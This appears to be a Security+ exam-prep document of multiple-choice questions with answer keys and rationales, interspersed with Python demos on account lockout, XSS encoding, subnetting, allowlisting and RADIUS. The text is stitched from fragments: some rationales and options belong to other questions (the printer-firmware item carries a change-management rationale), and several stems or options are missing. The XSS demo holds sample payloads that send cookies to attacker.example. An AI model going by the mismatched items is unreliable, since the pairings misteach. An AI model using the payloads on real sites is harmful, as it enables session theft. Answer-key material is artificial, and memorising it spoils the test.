CompTIA Security+ SY0-701 Fast Track: Accelerated Study Plan, Key Facts, and Practice Test Drills for Exam Success
Typology: Exams
2024/2025
Available from 07/13/2025
Uploaded by edwards-christopher (361 documents)

Here are the multiple-choice questions with rationales and the correct answers
indicated:
Question 1:
Users in the HR department were recently informed that they need to implement a user
training and awareness program which is tailored to their department. Which of the
following types of training would be the MOST appropriate for this department?
A. Handling PII - Correct Answer
B. Risk mitigation
C. Input validation
D. Hashing
Rationale:
A. Handling PII (Personally Identifiable Information): The HR department deals
with a significant amount of sensitive employee data, which falls under PII.
Training focused on the proper handling, storage, transmission, and disposal of
PII is crucial for this department to comply with privacy regulations and prevent
data breaches.
B. Risk mitigation: While risk mitigation is a general security concept relevant to
all departments, training specifically on handling PII would be more directly
applicable to the daily tasks and responsibilities of HR personnel.
C. Input validation: Input validation is a software development security practice
to prevent vulnerabilities like injection attacks. It's more relevant for developers
than HR professionals.
D. Hashing: Hashing is a cryptographic technique used to ensure data integrity
and for password storage. It's not a primary concern for the day-to-day tasks of
HR personnel.
Question 2:

Which of the following incident response plan steps would MOST likely involve engaging business professionals with the security team to discuss changes to existing procedures?
A. Recovery
B. Incident identification
C. Isolation / quarantine
D. Lessons learned - Correct Answer
E. Reporting
Rationale:

  • D. Lessons learned: The lessons learned phase of incident response involves reviewing the incident, the response actions taken, and identifying areas for improvement in the incident response plan and related procedures. This phase is crucial for engaging business professionals to understand the impact of the incident on business operations and to collaborate on changes to existing procedures to prevent similar incidents or improve future responses.
  • A. Recovery: The recovery phase focuses on restoring affected systems and services to normal operation. While business input is needed on prioritization, the procedural changes are usually discussed later.
  • B. Incident identification: This phase involves detecting and analyzing potential security incidents. It's primarily a technical activity.
  • C. Isolation / quarantine: This phase involves separating affected systems to prevent further damage. It's a technical action with immediate business impact considerations.
  • E. Reporting: Reporting involves communicating details of the incident to stakeholders. While business professionals are recipients of reports, the discussion of procedural changes happens more in the "lessons learned" phase.

Question 3:
A company is starting to allow employees to use their own personal devices without centralized management. Employees must contact IT to have their devices configured to use corporate email; access is also available to the corporate cloud-based servers. Which of the following is the BEST policy to implement under these circumstances?
A. Acceptable use policy - Correct Answer
B. Security policy

customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure typically associated with developing and launching an app. This often includes operating systems, programming language execution environments, databases, and web servers, all running on virtual infrastructure managed by the cloud provider.

  • A. An external entity that provides a physical or virtual instance of an installed operating system: This describes Infrastructure as a Service (IaaS).
  • B. A third party vendor supplying support services to maintain physical platforms and servers: This describes managed services, not a cloud computing model.
  • D. An internal group providing physical server instances without installed operating systems or support: This is more akin to managing bare metal servers internally, not a cloud service model.

Question 5:
One of the senior managers at a company called the help desk to report a problem. The manager could no longer access data on a laptop equipped with FDE. The manager requested that the FDE be removed and the laptop restored from a backup. The help desk informed the manager that the recommended solution was to decrypt the hard drive prior to reinstallation and recovery. The senior manager did not have a copy of the private key associated with the FDE on the laptop. Which of the following tools or techniques did the help desk use to avoid losing the data on the laptop?
A. Public key
B. Recovery agent - Correct Answer
C. Registration details
D. Trust Model
Rationale:
  • B. Recovery agent: Many Full Disk Encryption (FDE) solutions include a recovery agent feature. This allows authorized administrators (like the help desk) to decrypt the drive if the user loses their password or key. The recovery agent typically uses a separate key managed by the organization. This is the most likely mechanism the help desk would use to decrypt the drive without the manager's personal key.
  • A. Public key: Public keys are used in asymmetric cryptography for encryption, but they cannot decrypt data encrypted with the corresponding private key.
  • C. Registration details: Registration details might include information about the FDE setup but wouldn't provide a way to decrypt the drive without the proper key.
  • D. Trust Model: A trust model defines how entities within a system trust each other. It's not a tool or technique used for data recovery in FDE.

Question 6:
An employee in the accounting department recently received a phishing email that instructed them to click a link in the email to view an important message from the IRS, which threatened penalties if a response was not received by the end of the business day. The employee clicked on the link and the machine was infected with malware. Which of the following principles BEST describes why this social engineering ploy was successful?
A. Scarcity
B. Familiarity
C. Social proof
D. Urgency - Correct Answer
Rationale:
  • D. Urgency: The phishing email created a sense of urgency by threatening penalties if a response was not received by the end of the business day. This pressure tactic often bypasses critical thinking and encourages users to act quickly without verifying the legitimacy of the request.
  • A. Scarcity: The principle of scarcity suggests that things are more desirable when they are limited in quantity or availability. This wasn't the primary driver in this scenario.
  • B. Familiarity: The principle of familiarity suggests that people are more likely to trust and comply with requests from those they know or perceive as familiar. While the IRS might be a familiar entity, the email wasn't necessarily designed to appear as coming from a known individual.
  • C. Social proof: The principle of social proof suggests that people are more likely to take action if they see others doing the same. This tactic wasn't used in the described phishing attempt.

Question 7:
A security technician received notification of a remotely exploitable vulnerability affecting the firmware of all multifunction printers installed throughout the organization. The vulnerability allows a malicious user to review all the documents processed by the affected printers. Which of the following compensating controls can the security technician implement to mitigate the security risk of a sensitive document leak?
  • B. Change Management: Implementing a formal change management process is the best risk mitigation strategy to prevent unauthorized changes that lead to outages. This process typically includes steps for requesting, reviewing, approving, testing, and documenting all changes to the IT infrastructure. It ensures that changes are properly vetted and minimizes the risk of unintended consequences like the major outage described.
  • A. Asset Management: Asset management focuses on tracking and managing the organization's IT assets. While important for overall IT governance, it doesn't directly prevent unauthorized changes.
  • C. Configuration Management: Configuration management involves maintaining information about the configuration of IT assets. While it helps in understanding the environment, it doesn't inherently prevent unauthorized modifications. Change management builds upon configuration management by controlling how changes are made.
  • D. Incident Management: Incident management focuses on responding to and resolving IT incidents after they occur. While crucial for recovery, the CIO's request is for a preventative measure to avoid future outages caused by unauthorized changes.

An incident occurred when an outside attacker was able to gain access to network resources. During the incident response investigation, security logs indicated multiple failed login attempts for a network administrator. Which of the following controls, if in place, could have BEST prevented this successful attack?
A. Password history
B. Password complexity
C. Account lockout - Correct Answer
D. Account expiration

Joe needs to track employees who log into a confidential database and edit files. In the past, critical files have been edited, and no one admits to making the edits. Which of the following does Joe need to implement in order to enforce accountability?

A. Non-repudiation - Correct Answer
B. Fault tolerance
C. Hashing
D. Redundancy

A new mobile banking application is being developed and uses SSL/TLS certificates, but penetration tests show that it is still vulnerable to man-in-the-middle attacks, such as DNS hijacking. Which of the following would mitigate this attack?
A. Certificate revocation
B. Key escrow
C. Public key infrastructure
D. Certificate pinning - Correct Answer

One month after a software developer was terminated, the help desk started receiving calls that several employees' computers were being infected with malware. Upon further research, it was determined that these employees had downloaded a shopping toolbar. It was this toolbar that downloaded and installed the errant code. Which of the following attacks has taken place?
A. Logic bomb
B. Cross-site scripting
C. SQL injection
D. Malicious add-on - Correct Answer

Which of the following would an attacker use to generate and capture additional traffic prior to performing an IV attack?
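The account lockout question above hinges on what "multiple failed login attempts for a network administrator" looks like in a log and on how a lockout policy would have turned the attacker's eventually correct password into a rejected attempt. The script below is an added example, not part of the original study guide: it parses a few constructed OpenSSH-style log lines (sample data, not real logs; the year is assumed because syslog timestamps omit it), replays them through a hypothetical lockout policy of five failures within ten minutes followed by a thirty-minute lock, and shows the attacker's sixth, successful, guess being rejected because the account is already locked. Threshold, window and lockout duration are assumptions; use your own policy values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in OpenSSH/syslog style (not from the page).
# Lines 1-6: an outside host guesses the admin password and gets it right on the sixth try.
# Lines 7-8: an ordinary user mistypes once and then logs in normally.
SAMPLE_LOG = """\
Mar 12 09:14:01 bastion sshd[2101]: Failed password for netadmin from 203.0.113.7 port 51001 ssh2
Mar 12 09:14:04 bastion sshd[2101]: Failed password for netadmin from 203.0.113.7 port 51002 ssh2
Mar 12 09:14:06 bastion sshd[2101]: Failed password for netadmin from 203.0.113.7 port 51003 ssh2
Mar 12 09:14:09 bastion sshd[2101]: Failed password for netadmin from 203.0.113.7 port 51004 ssh2
Mar 12 09:14:11 bastion sshd[2101]: Failed password for netadmin from 203.0.113.7 port 51005 ssh2
Mar 12 09:14:15 bastion sshd[2101]: Accepted password for netadmin from 203.0.113.7 port 51006 ssh2
Mar 12 09:30:00 bastion sshd[2188]: Failed password for alice from 10.0.0.21 port 40001 ssh2
Mar 12 09:31:10 bastion sshd[2189]: Accepted password for alice from 10.0.0.21 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

def parse_auth_log(text, year=2024):
    """Return (timestamp, user, source ip, failed) tuples for lines that match the format."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["user"], m["ip"], m["result"] == "Failed"))
    return events

def simulate_lockout(events, threshold=5, window=timedelta(minutes=10), lockout=timedelta(minutes=30)):
    """Replay events through an account-lockout policy (assumed values above).
    Returns user -> list of (timestamp, verdict) where verdict is
    'allowed', 'failed', 'locked' (threshold reached, account now locked) or
    'rejected_locked' (attempt made during an active lockout, even with the right password)."""
    recent = defaultdict(list)   # user -> timestamps of failures inside the window
    locked_until = {}            # user -> lockout expiry
    verdicts = defaultdict(list)
    for ts, user, _ip, failed in sorted(events):
        if user in locked_until and ts < locked_until[user]:
            verdicts[user].append((ts, "rejected_locked"))
            continue
        if failed:
            recent[user] = [t for t in recent[user] if ts - t <= window] + [ts]
            if len(recent[user]) >= threshold:
                locked_until[user] = ts + lockout
                recent[user] = []
                verdicts[user].append((ts, "locked"))
            else:
                verdicts[user].append((ts, "failed"))
        else:
            recent[user] = []        # a genuine success resets the failure counter
            verdicts[user].append((ts, "allowed"))
    return dict(verdicts)

def accounts_locked(text):
    """Users whose activity in the log would have tripped the lockout."""
    verdicts = simulate_lockout(parse_auth_log(text))
    return sorted(u for u, rows in verdicts.items() if any(v == "locked" for _, v in rows))

if __name__ == "__main__":
    for user, rows in simulate_lockout(parse_auth_log(SAMPLE_LOG)).items():
        print(user, [v for _, v in rows])
```

Without the lockout, line 6 is simply a successful administrator login and the only trace is the burst of failures before it; with it, that same line is rejected and the lock itself becomes the alert.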

A. Segment the network
B. Use 802.1X
C. Deploy a proxy server
D. Configure ACLs
E. Write an acceptable use policy

Various employees have lost valuable customer data due to hard drives failing in company-provided laptops. It has been discovered that the hard drives used in one model of laptop provided by the company have been recalled by the manufacturer. The help desk is only able to replace the hard drives after they fail because there is no centralized record of the model of laptop given to each specific user. Which of the following could have prevented this situation from occurring?
A. Data backups
B. Asset tracking - Correct Answer
C. Support ownership
D. BYOD policies

Attempting to inject 50 alphanumeric keystrokes, including spaces, into an application input field that only expects four alpha characters is considered which of the following attacks?
A. XML injection
B. Buffer overflow - Correct Answer
C. LDAP injection
D. SQL injection

An organization is required to log all user internet activity. Which of the following would accomplish this requirement?
A. Configure an access list on the default gateway router. Configure the default gateway router to log all web traffic to a syslog server.
B. Configure a firewall on the internal network. On the client IP address configuration, use the IP address of the firewall as the default gateway; configure the firewall to log all traffic to a syslog server.
C. Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server. - Correct Answer
D. Configure an access list on the core switch; configure the core switch to log all web traffic to a syslog server.

An agent wants to create fast and efficient cryptographic keys to use with Diffie-Hellman without using prime numbers to generate the keys. Which of the following should be used?
A. Elliptic curve cryptography - Correct Answer
B. Quantum cryptography
C. Public key cryptography
D. Symmetric cryptography

Joe, an application developer, is building an external-facing marketing site. There is an area on the page where clients may submit their feedback to articles that are posted. Joe filters client-side JAVA input.
A. SQL injections
B. Watering holes
C. Cross site scripting - Correct Answer
D. Pharming
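The feedback-form question above is about cross-site scripting, and the detail that Joe filters input on the client side is the point: a browser-side filter can be skipped entirely by posting straight to the server, and a filter that only looks for script tags misses event-handler payloads. The following Python is an added example, not code from the study guide: it contrasts rendering a comment raw with encoding it for the HTML text context on the server, using three constructed inputs (sample data) of which the second carries no script tag at all. The page markup and the naive filter are illustrative assumptions.

```python
import html
import re

# Constructed attacker and user inputs for the feedback form (sample data, not from the page).
PAYLOADS = [
    "Great article! <script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
    "Loved it <3 and so did my \"colleagues\"",
]

SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script", re.IGNORECASE)

def naive_client_filter_passes(comment):
    """Stand-in for a browser-side filter that only rejects <script> tags (an assumption).
    Whatever it passes is still attacker-controlled on arrival, and an attacker can
    bypass the browser altogether by POSTing directly."""
    return SCRIPT_TAG_RE.search(comment) is None

OPEN, CLOSE = '<li class="feedback">', "</li>"

def render_unsafe(comment):
    # Vulnerable: the raw comment is interpolated into the HTML body.
    return f"{OPEN}{comment}{CLOSE}"

def render_safe(comment):
    # Fix: encode on output, on the server, for the HTML text context.
    # html.escape(quote=True) turns < > & " ' into entities so the browser shows
    # them as text instead of parsing them as tags or attributes.
    return f"{OPEN}{html.escape(comment, quote=True)}{CLOSE}"

def leaves_markup(fragment):
    """True if any '<' survives inside the comment slot, i.e. the browser would parse
    attacker-controlled markup rather than plain text."""
    inner = fragment[len(OPEN):len(fragment) - len(CLOSE)]
    return "<" in inner

def evaluate(payloads=PAYLOADS):
    """For each payload: (passes naive client filter, unsafe render leaves live markup,
    safe render leaves live markup)."""
    return [
        (naive_client_filter_passes(p), leaves_markup(render_unsafe(p)), leaves_markup(render_safe(p)))
        for p in payloads
    ]

if __name__ == "__main__":
    for payload, row in zip(PAYLOADS, evaluate()):
        print(row, render_safe(payload))
```

The third input is benign, and encoding still preserves its meaning (`<3` becomes `&lt;3` and displays as `<3`), which is why output encoding is the control to rely on rather than trying to enumerate bad input on the client.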

C. Incident management procedures
D. User rights audits and reviews

The Chief Information Security Officer (CISO) is concerned that users could bring their personal laptops to work and plug them directly into the network port under their desk. Which of the following should be configured on the network switch to prevent this from happening?
A. Access control lists
B. Loop protection
C. Firewall rule
D. Port security - Correct Answer

Ann, a network administrator, has been tasked with strengthening the authentication of users logging into systems in an area containing sensitive information. Users log in with usernames and passwords, followed by a retinal scan. Which of the following could she implement to add an additional factor of authentication?
A. Requiring PII usage
B. Fingerprint scanner
C. Magnetic swipe cards - Correct Answer
D. Complex passphrases

In an environment where availability is critical, such as industrial control and SCADA networks, which of the following technologies is the MOST critical layer of defense for such systems?
A. Log consolidation
B. Intrusion prevention system - Correct Answer

C. Automated patch deployment
D. Antivirus software

A security manager installed a standalone fingerprint reader at the data center. All employees that need to access the data center have been enrolled in the reader, and the local reader database is always kept updated. When an employee who has been enrolled uses the fingerprint reader, the door to the data center opens. Which of the following does this demonstrate? (Choose three.)
A. Two-factor authentication
B. Single sign-on
C. Something you have
D. Identification - Correct Answer
E. Authentication - Correct Answer
F. Authorization - Correct Answer

A network technician is configuring clients for VLAN access. The network address for the sales department is 192.168.0.64 with a broadcast address of 192.168.0.71. Which of the following IP address/subnet mask combinations could be used to correctly configure a client machine in the sales department?
A. 192.168.0.64/
B. 192.168.0.66/
C. 192.168.0.67/
D. 192.168.0.70/
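For the VLAN question above, the network address 192.168.0.64 and broadcast 192.168.0.71 together fix the prefix length, and a client is correctly configured only if it uses that prefix and an address strictly between the two. The prefix lengths in the page's options did not survive extraction, so the script below (an added example, not from the study guide) derives the subnet from the bounds and classifies a set of illustrative address/prefix candidates, which are assumptions for demonstration rather than the page's own options.

```python
import ipaddress

def subnet_from_bounds(network_addr, broadcast_addr):
    """Derive the only IPv4 subnet whose first address is network_addr and whose last
    address is broadcast_addr, by trying every prefix length from /32 down to /0."""
    net = ipaddress.IPv4Address(network_addr)
    bc = ipaddress.IPv4Address(broadcast_addr)
    for prefix in range(32, -1, -1):
        candidate = ipaddress.IPv4Network(f"{net}/{prefix}", strict=False)
        if candidate.network_address == net and candidate.broadcast_address == bc:
            return candidate
    raise ValueError(f"no prefix length spans {network_addr}-{broadcast_addr}")

def usable_hosts(subnet):
    return [str(h) for h in subnet.hosts()]

def classify_host(address_with_prefix, subnet):
    """Explain whether address/prefix is a valid client configuration for subnet."""
    iface = ipaddress.IPv4Interface(address_with_prefix)
    if iface.ip not in subnet:
        return "outside subnet"
    if iface.network != subnet:
        return "wrong mask"          # right address, but the client computes a different broadcast
    if iface.ip == subnet.network_address:
        return "network address"     # not assignable to a host
    if iface.ip == subnet.broadcast_address:
        return "broadcast address"   # not assignable to a host
    return "ok"

# Illustrative candidates (assumed prefixes; the page's options lost their mask part).
CANDIDATES = [
    "192.168.0.64/29", "192.168.0.66/30", "192.168.0.67/28", "192.168.0.70/29", "192.168.0.72/29",
]

def evaluate(network_addr="192.168.0.64", broadcast_addr="192.168.0.71", candidates=CANDIDATES):
    subnet = subnet_from_bounds(network_addr, broadcast_addr)
    return str(subnet), usable_hosts(subnet), {c: classify_host(c, subnet) for c in candidates}

if __name__ == "__main__":
    subnet, hosts, verdicts = evaluate()
    print(subnet, hosts)
    for candidate, verdict in verdicts.items():
        print(f"{candidate:18} {verdict}")
```

Whatever mask the page's option A carried, 192.168.0.64 is the network address of this block and cannot be assigned to a client; only .65 through .70 with a /29 are valid.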

policy? (Choose two.)
A. Discretionary access control
B. Federation
C. Single sign-on
D. TOTP
E. Two-factor authentication

Which of the following types of attacks is based on coordinating small slices of a task across multiple systems?
A. DDoS - Correct Answer
B. Spam
C. Spoofing
D. DoS

A system security analyst wants to capture data flowing in and out of the enterprise. Which of the following would MOST likely help in achieving this goal?
A. Taking screenshots
B. Analyzing big data metadata
C. Analyzing network traffic and logs - Correct Answer
D. Capturing a system image

The security manager reports that the process of checking certificates for revocation is too slow and should be automated. Which of the following should be used to automate this process?

A. CRL
B. GPG
C. OCSP - Correct Answer
D. Key escrow

A user attempts to install a new and relatively unknown software program recommended by a colleague. The user is unable to install the program, despite having successfully installed other programs previously. Which of the following is MOST likely the cause of the user's inability to complete the installation?
A. Application blacklisting
B. Network intrusion prevention system
C. Group Policy
D. Application whitelisting - Correct Answer

A company needs to provide web-based access to shared data sets to mobile users, while maintaining a standardized set of security controls. Which of the following technologies is the MOST appropriate storage?
A. Encrypted external hard drives
B. Cloud storage - Correct Answer
C. Encrypted mobile devices
D. Storage area network

An employee's mobile device associates with the company's guest WiFi SSID, but then is unable to retrieve email. The email settings appear to be correct. Which of the following is the MOST likely cause?
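The installation question above separates the two application-control models by their default: a blacklist allows anything it has not seen before, so an "unknown" program would install, whereas a whitelist denies anything not explicitly approved, which is exactly the symptom described. The Python below is an added example, not part of the study guide; it models both policies as sets of SHA-256 hashes over a few constructed byte strings standing in for program files (sample data, not real binaries), and also shows why the blacklist misses a trivially repacked copy of a known bad file.

```python
import hashlib

# Constructed stand-ins for program files (sample data; a few bytes each, not real binaries).
PROGRAMS = {
    "notepad.exe": b"MZ\x90\x00 approved text editor, build 1.2",
    "putty.exe": b"MZ\x90\x00 approved ssh client, build 0.81",
    "unknown-tool.exe": b"MZ\x90\x00 recommended by a colleague, never reviewed",
    "cryptominer.exe": b"MZ\x90\x00 known malicious sample",
}

def sha256(data):
    return hashlib.sha256(data).hexdigest()

# Allowlist (whitelist): hashes of every program the organization has reviewed and approved.
ALLOWLIST = {sha256(PROGRAMS["notepad.exe"]), sha256(PROGRAMS["putty.exe"])}
# Blocklist (blacklist): hashes of programs already known to be malicious.
BLOCKLIST = {sha256(PROGRAMS["cryptominer.exe"])}

def blocklist_decision(data):
    # Default allow: only what is already known bad is stopped.
    return "deny" if sha256(data) in BLOCKLIST else "allow"

def allowlist_decision(data):
    # Default deny: anything not explicitly approved is stopped, unknown or not.
    return "allow" if sha256(data) in ALLOWLIST else "deny"

def compare(programs=PROGRAMS):
    """name -> (blocklist verdict, allowlist verdict)"""
    return {name: (blocklist_decision(data), allowlist_decision(data)) for name, data in programs.items()}

def repacked(data):
    """One appended byte changes the hash, which is all a hash-based blocklist entry needs to miss."""
    return data + b"\x00"

if __name__ == "__main__":
    for name, (block, allow) in compare().items():
        print(f"{name:18} blocklist={block:5} allowlist={allow}")
    mutated = repacked(PROGRAMS["cryptominer.exe"])
    print("repacked miner:   ", blocklist_decision(mutated), allowlist_decision(mutated))
```

Real products (Windows AppLocker, for instance) usually allow by publisher certificate or path as well as by hash, but the default-deny property that blocks the colleague's unknown tool is the same.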

A company requires that all users enroll in the corporate PKI structure and digitally sign all emails. Which of the following are primary reasons to sign emails with digital certificates? (Choose two.)
A. To establish non-repudiation - Correct Answer
B. To ensure integrity - Correct Answer
C. To prevent SPAM
D. To establish data loss prevention
E. To protect confidentiality
F. To establish transport encryption

The Chief Information Officer (CIO) has asked a security analyst to determine the estimated costs associated with each potential breach of their database that contains customer information. Which of the following is the risk calculation that the CIO is asking for?
A. Impact
B. SLE - Correct Answer
C. ARO
D. ALE

A security assurance officer is preparing a plan to measure the technical state of a customer's enterprise. The testers employed to perform the audit will be given access to the customer facility and network. The testers will not be given access to the details of custom developed software used by the customer. However, the testers will have access to the source code for several open source applications and pieces of networking equipment used at the facility, but these items will not be within the scope of the audit.

Which of the following BEST describes the appropriate method of testing or technique to use in this scenario? (Choose two.)
A. Social engineering
B. All source
C. Black box - Correct Answer
D. Memory dumping
E. Penetration - Correct Answer

Which of the following authentication services combines authentication and authorization in a user profile and uses UDP?
A. LDAP
B. Kerberos
C. TACACS+
D. RADIUS - Correct Answer

A security administrator is designing an access control system, with an unlimited budget, to allow authenticated users access to network resources. Given that a multifactor authentication solution is more secure, which of the following is the BEST combination of factors?
A. Retina scanner, thumbprint scanner, and password
B. Username and password combo, voice recognition scanner, and retina scanner
C. Password, retina scanner, and proximity reader - Correct Answer
D. One-time password pad, palm-print scanner, and proximity photo badges

The access control list (ACL) for a file on a server is as follows:
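The RADIUS question above is answered from memory on the exam, but the reason RADIUS is remembered as "UDP, with authentication and authorization in one exchange" is the shape of the Access-Request datagram itself. The script below is an added example, not from the study guide: it builds an Access-Request per RFC 2865 (code, identifier, length, 16-byte Request Authenticator, then type-length-value attributes), hides the User-Password with the MD5 chain keyed by the shared secret, and parses the datagram back the way a server would. The shared secret, user name, password and NAS address are constructed sample values; sending the bytes with a UDP socket to port 1812 is left as a comment because it needs a live server.

```python
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def hide_password(password, secret, authenticator):
    """RFC 2865 section 5.2 User-Password hiding: pad with NULs to a multiple of 16, then
    XOR each 16-byte block with MD5(secret + previous ciphertext block), the first block
    being keyed by the Request Authenticator. This is keyed obfuscation, not encryption:
    anyone who learns the shared secret can reverse it from a packet capture."""
    padded = password + b"\x00" * ((-len(password)) % 16)
    if not padded:
        padded = b"\x00" * 16
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = xor_bytes(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out += block
        prev = block
    return out

def reveal_password(hidden, secret, authenticator):
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        out += xor_bytes(hidden[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def build_access_request(identifier, secret, username, password, nas_ip, authenticator=None):
    """Encode an Access-Request datagram: header, authenticator, then TLV attributes."""
    authenticator = authenticator or os.urandom(16)
    attributes = [
        (ATTR_USER_NAME, username.encode()),
        (ATTR_USER_PASSWORD, hide_password(password.encode(), secret, authenticator)),
        (ATTR_NAS_IP_ADDRESS, bytes(int(octet) for octet in nas_ip.split("."))),
    ]
    body = b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attributes)
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(body)) + authenticator + body

def parse_packet(datagram):
    """Decode header and attributes, rejecting length fields that disagree with the datagram."""
    code, identifier, length = struct.unpack("!BBH", datagram[:4])
    if length != len(datagram) or length < 20:
        raise ValueError("length field does not match datagram")
    attrs, pos = {}, 20
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        attr_type, attr_len = datagram[pos], datagram[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("malformed attribute")
        attrs[attr_type] = datagram[pos + 2:pos + attr_len]
        pos += attr_len
    return code, identifier, datagram[4:20], attrs

def server_view(datagram, secret):
    """What a RADIUS server holding the shared secret recovers from the datagram."""
    code, identifier, authenticator, attrs = parse_packet(datagram)
    return {
        "code": code,
        "identifier": identifier,
        "user": attrs[ATTR_USER_NAME].decode(),
        "password": reveal_password(attrs[ATTR_USER_PASSWORD], secret, authenticator).decode(),
        "nas_ip": ".".join(str(b) for b in attrs[ATTR_NAS_IP_ADDRESS]),
    }

if __name__ == "__main__":
    # Sample values (constructed). A NAS would send this with
    # socket.socket(AF_INET, SOCK_DGRAM).sendto(pkt, (radius_server, 1812)).
    pkt = build_access_request(7, b"s3cret", "alice", "Winter2024!", "10.0.0.5")
    print(pkt.hex())
    print(server_view(pkt, b"s3cret"))
```

The authorization half of the exam answer is the Access-Accept that comes back carrying attributes such as the VLAN or session timeout for that user; the weak MD5-based password hiding is why RADIUS over plain UDP should run only on a protected management network or be wrapped in RadSec (RADIUS over TLS).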